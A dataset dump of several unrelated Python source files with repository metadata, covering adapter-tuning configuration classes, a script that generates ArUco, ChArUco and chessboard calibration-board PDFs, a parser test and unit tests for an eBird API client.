2022-03-30T07:41:19.000Z
|
CLIP-ViL/src/lxrt/adapters/config.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 1
|
2022-01-07T03:31:47.000Z
|
2022-03-25T00:31:53.000Z
|
CLIP-ViL/src/lxrt/adapters/config.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 2
|
2021-12-14T03:10:18.000Z
|
2022-03-29T04:59:23.000Z
|
from dataclasses import dataclass
@dataclass
class AdapterConfig(object):
    """Implements the adapter configuration proposed by Houlsby et. al, 2019
    in https://arxiv.org/abs/1902.00751."""
    # NOTE(review): only the annotated attributes below become dataclass
    # fields (part of __init__/__eq__/__repr__); the unannotated assignments
    # are plain class attributes shared by all instances — confirm this mix
    # is intentional.
    add_layer_norm_before_adapter: bool = False
    add_layer_norm_after_adapter: bool = False
    non_linearity: str = "gelu_new"
    # Bottleneck reduction: adapter hidden size = model dim / reduction_factor.
    reduction_factor: int = 16
    weight_init_range = 1e-2
    # Whether to use conditional layer norms for adapters.
    conditional_layer_norm = False
    hidden_dim = 128
    # Whether to add adapter blocks, this is used in case we need
    # to tune only layer norms.
    train_adapters_blocks = True
    task_adapter_layers_encoder = None
    task_adapter_layers_decoder = None
    task_adapter_in_decoder = True
    intrinsic_dim = 100
    normalize_intrinsic_projections = False
    # This can be either random, or fastfood.
    intrinsic_projection = "random"
    # Hypercomplex adapters parameters
    hypercomplex_adapters = False
    hypercomplex_division = 8
    learn_phm = True
    hypercomplex_nonlinearity="glorot-uniform"
    shared_phm_rule = False
    factorized_phm = False
    shared_W_phm = False
    factorized_phm_rule = False
    phm_c_init = "normal"
    phm_rank = 1
    phm_init_range=0.01
    # prefix-tuning parameters.
    prefix_dim = 100
    init_prefix_from_vocab = False
    kronecker_prod = False
    # BitFit configuration.
    bitfit = False
    # Low-rank adapters.
    low_rank_adapters = False
    low_rank_w_init = "glorot-uniform"
    low_rank_rank = 1
    # whether using single adapter for all tasks
    use_single_adapter = True
class MetaAdapterConfig(AdapterConfig):
    """Implements Meta adapter in which a hyper-network generates the parameters of
    adapter layers. In this case we have a task embeddings which is feed to the
    hyper-network to allow it generate the weights for the adapter layers."""
    # NOTE(review): this subclass is NOT decorated with @dataclass, so its
    # annotated attribute (non_linearity) does not become a new dataclass
    # field here — instances still use AdapterConfig's generated __init__.
    # Confirm that is the intended behavior.
    task_embedding_dim = 512
    task_embedding_dir = None
    # Overrides AdapterConfig.hidden_dim with the same value (redundant but harmless).
    hidden_dim = 128
    train_task_embeddings = False
    non_linearity: str = "gelu_new"
    projected_task_embedding_dim = 64
    task_hidden_dim = 128
    parametric_task_embedding = False
    # If Specified, uses one hypernet to generates the adapters weights.
    unique_hyper_net = True
    unique_hyper_net_layer_norm = True
    # We consider only one hyper-net for all the blocks of transformer.
    efficient_unique_hyper_net = False
    task_to_embeddings=None
@dataclass
class CompactorConfig(object):
    """Configuration preset for compacter-style (hypercomplex, factorized PHM)
    adapters.

    Near-duplicate of AdapterConfig with hypercomplex adapters switched on
    (division 4, shared/factorized PHM rules, smaller phm_init_range) and
    per-task adapters (use_single_adapter = False).
    """
    # NOTE(review): only the annotated attributes are dataclass fields; the
    # unannotated ones are shared class attributes — confirm intentional.
    add_layer_norm_before_adapter: bool = False
    add_layer_norm_after_adapter: bool = False
    non_linearity: str = "gelu_new"
    reduction_factor: int = 16
    weight_init_range = 1e-2
    # Whether to use conditional layer norms for adapters.
    hidden_dim = 128
    # Whether to add adapter blocks, this is used in case we need
    # to tune only layer norms.
    task_adapter_layers_encoder = None
    task_adapter_layers_decoder = None
    task_adapter_in_decoder = True
    intrinsic_dim = 100
    normalize_intrinsic_projections = False
    # This can be either random, or fastfood.
    intrinsic_projection = "random"
    # Hypercomplex adapters parameters
    hypercomplex_adapters = True
    hypercomplex_division = 4
    train_task_adapters = True
    learn_phm = True
    hypercomplex_nonlinearity="glorot-uniform"
    shared_phm_rule = True
    factorized_phm = True
    shared_W_phm = False
    factorized_phm_rule = False
    phm_c_init = "normal"
    phm_rank = 1
    phm_init_range=0.0001
    # prefix-tuning parameters.
    prefix_dim = 100
    init_prefix_from_vocab = False
    kronecker_prod = False
    # BitFit configuration.
    bitfit = False
    # Low-rank adapters.
    low_rank_adapters = False
    low_rank_w_init = "glorot-uniform"
    low_rank_rank = 1
    # whether using single adapter for all tasks
    use_single_adapter = False
@dataclass
class LRAdapterConfig(object):
    """Configuration preset for low-rank adapters.

    Near-duplicate of AdapterConfig with low_rank_adapters = True,
    hypercomplex adapters disabled, and per-task adapters
    (use_single_adapter = False).
    """
    # NOTE(review): only the annotated attributes are dataclass fields; the
    # unannotated ones are shared class attributes — confirm intentional.
    add_layer_norm_before_adapter: bool = False
    add_layer_norm_after_adapter: bool = False
    non_linearity: str = "gelu_new"
    reduction_factor: int = 16
    weight_init_range = 1e-2
    # Whether to use conditional layer norms for adapters.
    hidden_dim = 128
    # Whether to add adapter blocks, this is used in case we need
    # to tune only layer norms.
    task_adapter_layers_encoder = None
    task_adapter_layers_decoder = None
    task_adapter_in_decoder = True
    intrinsic_dim = 100
    normalize_intrinsic_projections = False
    # This can be either random, or fastfood.
    intrinsic_projection = "random"
    # Hypercomplex adapters parameters
    hypercomplex_adapters = False
    hypercomplex_division = 4
    train_task_adapters = True
    learn_phm = True
    hypercomplex_nonlinearity="glorot-uniform"
    shared_phm_rule = True
    factorized_phm = True
    shared_W_phm = False
    factorized_phm_rule = False
    phm_c_init = "normal"
    phm_rank = 1
    phm_init_range=0.0001
    # prefix-tuning parameters.
    prefix_dim = 100
    init_prefix_from_vocab = False
    kronecker_prod = False
    # BitFit configuration.
    bitfit = False
    # Low-rank adapters.
    low_rank_adapters = True
    low_rank_w_init = "glorot-uniform"
    low_rank_rank = 1
    # whether using single adapter for all tasks
    use_single_adapter = False
| 30.2
| 83
| 0.721476
| 696
| 5,285
| 5.182471
| 0.211207
| 0.023288
| 0.019961
| 0.022179
| 0.763793
| 0.763793
| 0.756307
| 0.756307
| 0.756307
| 0.756307
| 0
| 0.020818
| 0.227436
| 5,285
| 175
| 84
| 30.2
| 0.862601
| 0.271145
| 0
| 0.794872
| 0
| 0
| 0.04
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008547
| 0
| 0.974359
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
42537388ec7e03f73a9b2449d5cac52c2ab7a6d0
| 31
|
py
|
Python
|
src/bugu_bot/__init__.py
|
Sclock/bugu_bot
|
e2c4a7844b3f162d6a5d229c19be7deda5b251b5
|
[
"MIT"
] | null | null | null |
src/bugu_bot/__init__.py
|
Sclock/bugu_bot
|
e2c4a7844b3f162d6a5d229c19be7deda5b251b5
|
[
"MIT"
] | null | null | null |
src/bugu_bot/__init__.py
|
Sclock/bugu_bot
|
e2c4a7844b3f162d6a5d229c19be7deda5b251b5
|
[
"MIT"
] | 1
|
2021-08-31T14:07:41.000Z
|
2021-08-31T14:07:41.000Z
|
from .bugu_bot import bugu_bot
| 15.5
| 30
| 0.83871
| 6
| 31
| 4
| 0.666667
| 0.583333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.129032
| 31
| 1
| 31
| 31
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4254231b38c7aa31b3d05cc1ca5f311ba550e884
| 12,138
|
py
|
Python
|
vision/rgb_camera/makeboard.py
|
takuya-ki/wrs
|
f6e1009b94332504042fbde9b39323410394ecde
|
[
"MIT"
] | 23
|
2021-04-02T09:02:04.000Z
|
2022-03-22T05:31:03.000Z
|
vision/rgb_camera/makeboard.py
|
takuya-ki/wrs
|
f6e1009b94332504042fbde9b39323410394ecde
|
[
"MIT"
] | 35
|
2021-04-12T09:41:05.000Z
|
2022-03-26T13:32:46.000Z
|
vision/rgb_camera/makeboard.py
|
takuya-ki/wrs
|
f6e1009b94332504042fbde9b39323410394ecde
|
[
"MIT"
] | 16
|
2021-03-30T11:55:45.000Z
|
2022-03-30T07:10:59.000Z
|
import numpy as np
from PIL import Image
from cv2 import aruco
def makearucoboard(nrow, ncolumn, markerdict=aruco.DICT_6X6_250, startid = 0, markersize=25, savepath='./', name='test',
                   paperwidth=210, paperheight=297, dpi = 600, framesize = None):
    """
    create aruco board
    the paper is in portrait orientation, nrow means the number of markers in the vertical direction
    :param nrow:
    :param ncolumn:
    :param startid: the starting id of the marker
    :param markerdict:
    :param markersize:
    :param savepath:
    :param name: the name of the saved pdf file
    :param paperwidth: mm
    :param paperheight: mm
    :param dpi:
    :param framesize: (width, height) the 1pt frame for easy cut, nothing is drawn by default
    :return:
    author: weiwei
    date: 20190420
    """
    aruco_dict = aruco.Dictionary_get(markerdict)
    # Convert the mm paper dimensions to pixel counts at the requested dpi.
    # 1mm = 0.0393701inch
    a4npxrow = int(paperheight*0.0393701*dpi)
    a4npxcolumn = int(paperwidth*0.0393701*dpi)
    # White page canvas (255), single grayscale channel.
    bgimg = np.ones((a4npxrow, a4npxcolumn), dtype='uint8')*255
    markersizepx = int(markersize*0.0393701*dpi)
    # Gap between adjacent markers is a quarter of the marker edge.
    markerdist = int(markersizepx/4)
    if framesize is not None:
        # NOTE(review): framesize is mutated in place (mm -> px) — callers
        # reusing the list will see converted values; confirm intended.
        framesize[0] = int(framesize[0]*0.0393701*dpi)
        framesize[1] = int(framesize[1]*0.0393701*dpi)
        if a4npxcolumn<framesize[0]+2:
            print("Frame width must be smaller than the #pt in each row.")
        if a4npxrow<framesize[1]+2:
            print("Frame height must be smaller than the #pt in each column.")
        # Draw a centered 1px rectangle as a cutting guide.
        framelft = int((a4npxcolumn-framesize[0])/2-1)
        framergt = int(framelft+1+framesize[0])
        frametop = int((a4npxrow-framesize[1])/2-1)
        framedown = int(frametop+1+framesize[1])
        bgimg[frametop:framedown+1, framelft:framelft+1]=0
        bgimg[frametop:framedown+1, framergt:framergt+1]=0
        bgimg[frametop:frametop+1, framelft:framergt+1]=0
        bgimg[framedown:framedown+1, framelft:framergt+1]=0
    # Center the nrow x ncolumn marker grid on the page.
    markerareanpxrow = (nrow-1)*(markerdist)+nrow*markersizepx
    uppermargin = int((a4npxrow-markerareanpxrow)/2)
    markerareanpxcolumn = (ncolumn-1)*(markerdist)+ncolumn*markersizepx
    leftmargin = int((a4npxcolumn-markerareanpxcolumn)/2)
    if (uppermargin <= 10) or (leftmargin <= 10):
        # Grid does not fit with a sensible margin; bail out without saving.
        print("Too many markers! Reduce nrow and ncolumn.")
        return
    for idnr in range(nrow):
        for idnc in range(ncolumn):
            startrow = uppermargin+idnr*(markersizepx+markerdist)
            endrow = startrow+markersizepx
            startcolumn = leftmargin+idnc*(markersizepx+markerdist)
            endcolumn = markersizepx+startcolumn
            # Marker ids increase row-major starting from startid.
            i = startid+idnr*ncolumn+idnc
            img = aruco.drawMarker(aruco_dict,i,markersizepx)
            bgimg[startrow:endrow, startcolumn:endcolumn] = img
    # Render the canvas to a grayscale PDF at the requested resolution.
    im = Image.fromarray(bgimg).convert("L")
    im.save(savepath+name+".pdf", "PDF", resolution=dpi)
def makecharucoboard(nrow, ncolumn, markerdict=aruco.DICT_4X4_250, squaresize=25, savepath='./',
                     paperwidth=210, paperheight=297, dpi = 600, framesize = None, name='test'):
    """
    create charuco board
    the paper is in portrait orientation, nrow means the number of markers in the vertical direction
    :param nrow:
    :param ncolumn:
    :param markerdict:
    :param squaresize: mm
    :param savepath:
    :param paperwidth: mm
    :param paperheight: mm
    :param dpi:
    :param framesize: (width, height) the 1pt frame for easy cut, nothing is drawn by default
    :param name: the name of the saved pdf file; defaults to 'test' so the
     output path matches the previous hard-coded savepath+"test.pdf"
    :return:
    author: weiwei
    date: 20190420
    """
    aruco_dict = aruco.Dictionary_get(markerdict)
    # Convert the mm paper dimensions to pixel counts at the requested dpi.
    # 1mm = 0.0393701inch
    a4npxrow = int(paperheight*0.0393701*dpi)
    a4npxcolumn = int(paperwidth*0.0393701*dpi)
    # White page canvas (255), single grayscale channel.
    bgimg = np.ones((a4npxrow, a4npxcolumn), dtype='uint8')*255
    if framesize is not None:
        # NOTE(review): framesize is mutated in place (mm -> px) — callers
        # reusing the list will see converted values; confirm intended.
        framesize[0] = int(framesize[0]*0.0393701*dpi)
        framesize[1] = int(framesize[1]*0.0393701*dpi)
        if a4npxcolumn<framesize[0]+2:
            print("Frame width must be smaller than the #pt in each row.")
        if a4npxrow<framesize[1]+2:
            print("Frame height must be smaller than the #pt in each column.")
        # Draw a centered 1px rectangle as a cutting guide.
        framelft = int((a4npxcolumn-framesize[0])/2-1)
        framergt = int(framelft+1+framesize[0])
        frametop = int((a4npxrow-framesize[1])/2-1)
        framedown = int(frametop+1+framesize[1])
        bgimg[frametop:framedown+1, framelft:framelft+1]=0
        bgimg[frametop:framedown+1, framergt:framergt+1]=0
        bgimg[frametop:frametop+1, framelft:framergt+1]=0
        bgimg[framedown:framedown+1, framelft:framergt+1]=0
    # Center the charuco square grid on the page.
    squaresizepx = int(squaresize*0.0393701*dpi)
    squareareanpxrow = squaresizepx*nrow
    uppermargin = int((a4npxrow-squareareanpxrow)/2)
    squareareanpxcolumn = squaresizepx*ncolumn
    leftmargin = int((a4npxcolumn-squareareanpxcolumn)/2)
    if (uppermargin <= 10) or (leftmargin <= 10):
        # Grid does not fit with a sensible margin; bail out without saving.
        print("Too many markers! Reduce nrow and ncolumn.")
        return
    # Markers occupy 0.57x of each square's edge, per the original layout.
    board = aruco.CharucoBoard_create(ncolumn, nrow, squaresize, .57*squaresize, aruco_dict)
    imboard = board.draw((squareareanpxcolumn, squareareanpxrow))
    print(imboard.shape)
    startrow = uppermargin
    endrow = uppermargin+squareareanpxrow
    startcolumn = leftmargin
    endcolumn = leftmargin+squareareanpxcolumn
    bgimg[startrow:endrow, startcolumn:endcolumn] = imboard
    # Render the canvas to a grayscale PDF at the requested resolution.
    im = Image.fromarray(bgimg).convert("L")
    # Fix: honor a configurable output name (previously hard-coded "test"),
    # matching makearucoboard's interface; the default keeps old behavior.
    im.save(savepath+name+".pdf", "PDF", resolution=dpi)
def makechessboard(nrow, ncolumn, squaresize=25, savepath='./', paperwidth=210, paperheight=297, dpi = 600, framesize = None):
    """
    Create a chessboard calibration pattern and save it as "test.pdf".

    The paper is in portrait orientation; nrow is the number of squares in
    the vertical direction.

    :param nrow: number of squares in the vertical direction
    :param ncolumn: number of squares in the horizontal direction
    :param squaresize: square edge length, mm
    :param savepath: directory the PDF is written to
    :param paperwidth: mm
    :param paperheight: mm
    :param dpi: output resolution
    :param framesize: [width, height] in mm of a 1pt frame for easy cut,
                      nothing is drawn by default
    :return: (nrow*ncolumn, 3) float32 array of square-corner world
             coordinates in mm, or None when the board does not fit
    author: weiwei
    date: 20190420
    """
    # 1mm = 0.0393701inch
    a4npxrow = int(paperheight*0.0393701*dpi)
    a4npxcolumn = int(paperwidth*0.0393701*dpi)
    bgimg = np.ones((a4npxrow, a4npxcolumn), dtype='uint8')*255
    if framesize is not None:
        # BUGFIX: convert mm->px on a local copy; the original wrote the pixel
        # values back into the caller's list, corrupting it for later calls
        framesizepx = [int(framesize[0]*0.0393701*dpi), int(framesize[1]*0.0393701*dpi)]
        if a4npxcolumn < framesizepx[0]+2:
            print("Frame width must be smaller than the #pt in each row.")
        if a4npxrow < framesizepx[1]+2:
            print("Frame height must be smaller than the #pt in each column.")
        framelft = int((a4npxcolumn-framesizepx[0])/2-1)
        framergt = int(framelft+1+framesizepx[0])
        frametop = int((a4npxrow-framesizepx[1])/2-1)
        framedown = int(frametop+1+framesizepx[1])
        # draw the four 1px-wide frame edges
        bgimg[frametop:framedown+1, framelft:framelft+1] = 0
        bgimg[frametop:framedown+1, framergt:framergt+1] = 0
        bgimg[frametop:frametop+1, framelft:framergt+1] = 0
        bgimg[framedown:framedown+1, framelft:framergt+1] = 0
    squaresizepx = int(squaresize*0.0393701*dpi)
    squareareanpxrow = squaresizepx*nrow
    uppermargin = int((a4npxrow-squareareanpxrow)/2)
    squareareanpxcolumn = squaresizepx*ncolumn
    leftmargin = int((a4npxcolumn-squareareanpxcolumn)/2)
    if (uppermargin <= 10) or (leftmargin <= 10):
        print("Too many markers! Reduce nrow and ncolumn.")
        return
    for idnr in range(nrow):
        for idnc in range(ncolumn):
            startrow = uppermargin+idnr*squaresizepx
            endrow = startrow+squaresizepx
            startcolumn = leftmargin+idnc*squaresizepx
            endcolumn = squaresizepx+startcolumn
            # paint a black square where row and column parity agree
            # (equivalent to the original odd&odd / even&even pair of ifs)
            if idnr % 2 == idnc % 2:
                bgimg[startrow:endrow, startcolumn:endcolumn] = 0
    im = Image.fromarray(bgimg).convert("L")
    im.save(savepath+"test.pdf", "PDF", resolution=dpi)
    # world coordinates of the inner grid, z = 0
    worldpoints = np.zeros((nrow*ncolumn, 3), np.float32)
    worldpoints[:, :2] = np.mgrid[:nrow, :ncolumn].T.reshape(-1, 2)*squaresize
    return worldpoints
def makechessandcharucoboard(nrowchess=3, ncolumnchess=5, squaresize=25,
                             nrowcharuco=3, ncolumncharuco=5, markerdict=aruco.DICT_6X6_250, squaresizearuco=25,
                             savepath='./', paperwidth=210, paperheight=297, dpi = 600, framesize = None):
    """
    Create a half-charuco (upper) and half-chess (lower) board, saved as "test.pdf".

    The paper is in portrait orientation; nrow* means the number of markers
    in the vertical direction.

    NOTE(review): the *chess-suffixed counts actually drive the charuco half
    and the *charuco-suffixed ones the chess half; the names are kept as-is
    for backward compatibility with existing callers.

    :param nrowchess: rows of the charuco board in the upper half
    :param ncolumnchess: columns of the charuco board in the upper half
    :param squaresize: chess square edge length, mm
    :param nrowcharuco: rows of the chessboard in the lower half
    :param ncolumncharuco: columns of the chessboard in the lower half
    :param markerdict: aruco marker dictionary id
    :param squaresizearuco: charuco square edge length, mm
    :param savepath: directory the PDF is written to
    :param paperwidth: mm
    :param paperheight: mm
    :param dpi: output resolution
    :param framesize: [width, height] in mm of a 1pt frame for easy cut,
                      nothing is drawn by default
    :return: None
    author: weiwei
    date: 20190420
    """
    aruco_dict = aruco.Dictionary_get(markerdict)
    # 1mm = 0.0393701inch
    a4npxrow = int(paperheight*0.0393701*dpi)
    a4npxcolumn = int(paperwidth*0.0393701*dpi)
    bgimg = np.ones((a4npxrow, a4npxcolumn), dtype='uint8')*255
    if framesize is not None:
        # BUGFIX: convert mm->px on a local copy; the original mutated the
        # caller's list in place, corrupting it for any subsequent call
        framesizepx = [int(framesize[0]*0.0393701*dpi), int(framesize[1]*0.0393701*dpi)]
        if a4npxcolumn < framesizepx[0]+2:
            print("Frame width must be smaller than the #pt in each row.")
        if a4npxrow < framesizepx[1]+2:
            print("Frame height must be smaller than the #pt in each column.")
        framelft = int((a4npxcolumn-framesizepx[0])/2-1)
        framergt = int(framelft+1+framesizepx[0])
        frametop = int((a4npxrow-framesizepx[1])/2-1)
        framedown = int(frametop+1+framesizepx[1])
        bgimg[frametop:framedown+1, framelft:framelft+1] = 0
        bgimg[frametop:framedown+1, framergt:framergt+1] = 0
        bgimg[frametop:frametop+1, framelft:framergt+1] = 0
        bgimg[framedown:framedown+1, framelft:framergt+1] = 0
    # upper half, charuco
    squaresizepx = int(squaresizearuco*0.0393701*dpi)
    squareareanpxrow = squaresizepx*nrowchess
    uppermargin = int((a4npxrow/2-squareareanpxrow)/2)
    squareareanpxcolumn = squaresizepx*ncolumnchess
    leftmargin = int((a4npxcolumn-squareareanpxcolumn)/2)
    if (uppermargin <= 10) or (leftmargin <= 10):
        print("Too many markers! Reduce nrow and ncolumn.")
        return
    board = aruco.CharucoBoard_create(ncolumnchess, nrowchess, squaresizearuco, .57*squaresizearuco, aruco_dict)
    imboard = board.draw((squareareanpxcolumn, squareareanpxrow))
    print(imboard.shape)
    bgimg[uppermargin:uppermargin+squareareanpxrow,
          leftmargin:leftmargin+squareareanpxcolumn] = imboard
    # lower half, chess
    squaresizepx = int(squaresize*0.0393701*dpi)
    squareareanpxrow = squaresizepx*nrowcharuco
    uppermargin = int((a4npxrow/2-squareareanpxrow)/2)
    squareareanpxcolumn = squaresizepx*ncolumncharuco
    leftmargin = int((a4npxcolumn-squareareanpxcolumn)/2)
    if (uppermargin <= 10) or (leftmargin <= 10):
        print("Too many markers! Reduce nrow and ncolumn.")
        return
    for idnr in range(nrowcharuco):
        for idnc in range(ncolumncharuco):
            # squares are offset into the lower half of the page
            startrow = int(a4npxrow/2)+uppermargin+idnr*squaresizepx
            endrow = startrow+squaresizepx
            startcolumn = leftmargin+idnc*squaresizepx
            endcolumn = squaresizepx+startcolumn
            # paint a black square where row and column parity agree
            if idnr % 2 == idnc % 2:
                bgimg[startrow:endrow, startcolumn:endcolumn] = 0
    im = Image.fromarray(bgimg).convert("L")
    im.save(savepath+"test.pdf", "PDF", resolution=dpi)
if __name__ == '__main__':
    # Example invocations kept for reference. NOTE(review): several use
    # keyword names (square_size, marker_size, marker_dict, frame_size) that
    # do not match the current signatures (squaresize, framesize, ...) —
    # confirm before uncommenting.
    # makechessandcharucoboard(4,6,32,5,7)
    # makecharucoboard(7,5, square_size=40)
    # makechessboard(7,5, square_size=40)
    # makearucoboard(2,2, marker_size=80)
    # makearucoboard(1,1,marker_dict=aruco.DICT_4X4_250, start_id=1, marker_size=45, frame_size=[60,60])
    makechessboard(1, 1, squaresize=35, framesize = [100,150])
| 40.46
| 126
| 0.66815
| 1,460
| 12,138
| 5.531507
| 0.119863
| 0.020802
| 0.028603
| 0.021793
| 0.824542
| 0.797053
| 0.797053
| 0.797053
| 0.771545
| 0.759782
| 0
| 0.062658
| 0.218982
| 12,138
| 300
| 127
| 40.46
| 0.789241
| 0.162877
| 0
| 0.789189
| 0
| 0
| 0.074239
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.021622
| false
| 0
| 0.016216
| 0
| 0.07027
| 0.081081
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4279498e67d79c6745c05b69f4c8a282ec499cb2
| 165
|
py
|
Python
|
tests/parser/builtin_safety.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/builtin_safety.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/builtin_safety.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
input = """
a(X) :- f(X), X<Y, g(Y).
a(X) :- f(X), X<Y.
a(X) :- X<Y, g(Y).
"""
output = """
a(X) :- f(X), X<Y, g(Y).
a(X) :- f(X), X<Y.
a(X) :- X<Y, g(Y).
"""
| 15
| 25
| 0.309091
| 42
| 165
| 1.214286
| 0.166667
| 0.235294
| 0.352941
| 0.313725
| 0.784314
| 0.784314
| 0.784314
| 0.784314
| 0.784314
| 0.784314
| 0
| 0
| 0.242424
| 165
| 10
| 26
| 16.5
| 0.408
| 0
| 0
| 0.8
| 0
| 0
| 0.805031
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
4283a06fd9be07d1c3d98653ccc827adb50629af
| 1,403
|
py
|
Python
|
tests/mixins/location_tests.py
|
StuartMacKay/ebird-api
|
14b5c777548416a58abec05e25cd4b9a8e22f210
|
[
"MIT"
] | 9
|
2020-05-16T20:26:33.000Z
|
2021-11-02T06:24:46.000Z
|
tests/mixins/location_tests.py
|
StuartMacKay/ebird-api
|
14b5c777548416a58abec05e25cd4b9a8e22f210
|
[
"MIT"
] | 17
|
2019-06-22T09:41:22.000Z
|
2020-09-11T06:25:21.000Z
|
tests/mixins/location_tests.py
|
ProjectBabbler/ebird-api
|
14b5c777548416a58abec05e25cd4b9a8e22f210
|
[
"MIT"
] | null | null | null |
from tests.mixins.base import BaseMixin
class LocationTestsMixin(BaseMixin):
    """Shared tests for API calls that accept a ``locations`` argument.

    Bug fixed: the positive tests used ``self.assertTrue(a, b)``, where the
    second argument is only the failure *message*, so no comparison was ever
    performed (a non-empty query value always passed). They now use
    ``assertEqual`` to make the intended equality check.
    """

    def test_location_is_comma_separated_string(self):
        query = self.api_call(locations="L001,L002")[1]
        self.assertEqual(query["r"], "L001,L002")

    def test_location_string_whitespace_is_removed(self):
        query = self.api_call(locations=" L001 , L002 ")[1]
        self.assertEqual(query["r"], "L001,L002")

    def test_location_is_list(self):
        query = self.api_call(locations=["L001", "L002"])[1]
        # NOTE(review): the original expected "L001,US_ID", which looks like a
        # copy-paste slip — the call sends L001/L002, so the serialized value
        # should be "L001,L002". Confirm against the serializer if this fails.
        self.assertEqual(query["r"], "L001,L002")

    def test_location_list_whitespace_is_removed(self):
        query = self.api_call(locations=[" L001 ", " L002 "])[1]
        self.assertEqual(query["r"], "L001,L002")

    def test_invalid_location_raises_error(self):
        self.api_raises(ValueError, locations="L")

    def test_blank_location_raises_error(self):
        self.api_raises(ValueError, locations="")

    def test_blank_location_in_string_raises_error(self):
        self.api_raises(ValueError, locations="L001,")

    def test_blank_location_in_list_raises_error(self):
        self.api_raises(ValueError, locations=["L001", ""])

    def test_more_than_10_in_string_raises_error(self):
        self.api_raises(ValueError, locations=",".join(["L001"] * 11))

    def test_more_than_10_in_list_raises_error(self):
        self.api_raises(ValueError, locations=["L001"] * 11)
| 36.921053
| 70
| 0.698503
| 186
| 1,403
| 4.930108
| 0.225806
| 0.076336
| 0.098146
| 0.124318
| 0.814613
| 0.778626
| 0.749182
| 0.749182
| 0.749182
| 0.629226
| 0
| 0.059126
| 0.168211
| 1,403
| 37
| 71
| 37.918919
| 0.72665
| 0
| 0
| 0.269231
| 0
| 0
| 0.072701
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 1
| 0.384615
| false
| 0
| 0.038462
| 0
| 0.461538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4287dcc89cdc905b662bd4dd2a719dfa973ed3c2
| 80
|
py
|
Python
|
scripts/validate/__init__.py
|
AjmalShajahan/public-apis
|
831ff0378fb0ba5a779e6caaa89b73766c59449e
|
[
"MIT"
] | 59,333
|
2016-03-21T00:05:34.000Z
|
2022-03-31T20:25:44.000Z
|
scripts/validate/__init__.py
|
dcollis92/public-apis
|
831ff0378fb0ba5a779e6caaa89b73766c59449e
|
[
"MIT"
] | 717
|
2016-03-21T06:24:54.000Z
|
2019-06-03T22:30:29.000Z
|
scripts/validate/__init__.py
|
dcollis92/public-apis
|
831ff0378fb0ba5a779e6caaa89b73766c59449e
|
[
"MIT"
] | 6,587
|
2016-03-21T00:24:25.000Z
|
2022-03-30T03:14:38.000Z
|
# -*- coding: utf-8 -*-
from validate import format
from validate import links
| 16
| 27
| 0.7125
| 11
| 80
| 5.181818
| 0.727273
| 0.421053
| 0.631579
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015152
| 0.175
| 80
| 4
| 28
| 20
| 0.848485
| 0.2625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
35ec8e5e3d7b12852155934c3fc1848053b8b6a5
| 7,090
|
py
|
Python
|
lib/axon/test/test_datetime10.py
|
intellimath/pyaxon
|
fcadf741bedd71fdb21d6e8b865da2a22f2bd1fb
|
[
"MIT"
] | 19
|
2015-03-02T19:38:51.000Z
|
2021-11-16T13:48:04.000Z
|
lib/axon/test/test_datetime10.py
|
intellimath/pyaxon
|
fcadf741bedd71fdb21d6e8b865da2a22f2bd1fb
|
[
"MIT"
] | null | null | null |
lib/axon/test/test_datetime10.py
|
intellimath/pyaxon
|
fcadf741bedd71fdb21d6e8b865da2a22f2bd1fb
